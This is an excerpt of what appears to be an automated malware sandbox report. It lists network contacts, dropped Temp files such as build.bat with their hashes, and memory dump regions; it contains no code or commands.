| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 104.26.12.31:443 | api.ip.sb | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat
| MD5 | 23bad6dd1951a20924f5046c913d8ff2 |
| SHA1 | 812500904e0800703382b460c20e0ed3b1ff0b4d |
| SHA256 | 03bbd3b3e518b52769bb9cf6e158cc771869b86b3a5ae74072aa82ac2be739bd |
| SHA512 | 5368bbe4046a080dcdc53774a4197f92adf65c640135bbc3a0cae9111d6d8a6779648b4b68ccd1251c4819c1cd043a7ef88efd4d0bf70ed02eab1dc2ca656e91 |
memory/1780-3-0x0000000074FDE000-0x0000000074FDF000-memory.dmp
memory/1780-4-0x0000000004F50000-0x0000000004F86000-memory.dmp
memory/1780-5-0x00000000056E0000-0x0000000005D0A000-memory.dmp
memory/1780-6-0x0000000074FD0000-0x0000000075781000-memory.dmp
memory/1780-7-0x0000000074FD0000-0x0000000075781000-memory.dmp
memory/1780-8-0x0000000005570000-0x0000000005592000-memory.dmp
memory/1780-9-0x0000000005D80000-0x0000000005DE6000-memory.dmp
memory/1780-10-0x0000000005DF0000-0x0000000005E56000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cenr0r1r.yvn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1780-19-0x0000000005E60000-0x00000000061B7000-memory.dmp
memory/1780-20-0x0000000006300000-0x000000000631E000-memory.dmp
memory/1780-21-0x0000000006340000-0x000000000638C000-memory.dmp
memory/1780-22-0x0000000007B50000-0x00000000081CA000-memory.dmp
memory/1780-23-0x0000000006900000-0x000000000691A000-memory.dmp
memory/1780-24-0x00000000074F0000-0x00000000074F8000-memory.dmp
memory/1780-25-0x0000000007500000-0x0000000007512000-memory.dmp
memory/1780-26-0x0000000007510000-0x000000000752E000-memory.dmp
memory/1780-27-0x00000000087F0000-0x0000000008E08000-memory.dmp
memory/1780-28-0x00000000075F0000-0x0000000007602000-memory.dmp
memory/1780-29-0x0000000007650000-0x000000000768C000-memory.dmp
memory/1780-30-0x00000000077D0000-0x00000000078DA000-memory.dmp
memory/1780-31-0x00000000083A0000-0x0000000008562000-memory.dmp
memory/1780-32-0x0000000009340000-0x000000000986C000-memory.dmp
memory/1780-33-0x0000000074FD0000-0x0000000075781000-memory.dmp